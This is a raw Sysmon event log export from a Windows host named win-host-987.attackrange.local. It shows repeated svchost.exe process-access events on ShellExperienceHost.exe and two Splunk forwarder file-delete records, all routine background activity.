15:09:59.191{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344441Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.191{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344440Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.191{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344439Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.191{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344438Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.191{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344437Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.191{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344436Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.191{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035344435Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.191{B81B27B7-4012-611D-0D00-00000000C801}792812C:\Windows\system32\svchost.exe{B81B27B7-4134-611D-AC00-00000000C801}4856C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+ed71|c:\windows\system32\rpcss.dll+b954|c:\windows\system32\rpcss.dll+ce2e|c:\windows\system32\rpcss.dll+a853|c:\windows\system32\rpcss.dll+42251|c:\windows\system32\rpcss.dll+42382|c:\windows\system32\rpcss.dll+426bf|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035344434Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:09:59.059{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=CE266587B9DA85CEDF46CFF797C629A2,SHA256=B253FEF10F0DF4137C824064042DA7B49A658BE7494A000736B10ABD73D8F432,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035344467Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:10:00.328{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C16A7139098EB2EFDA3BC83FC21D3DC3,SHA256=DFC950848B296A89DFDA7753CF2475440BC344CF94F38294B419DFAD7EC554EE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space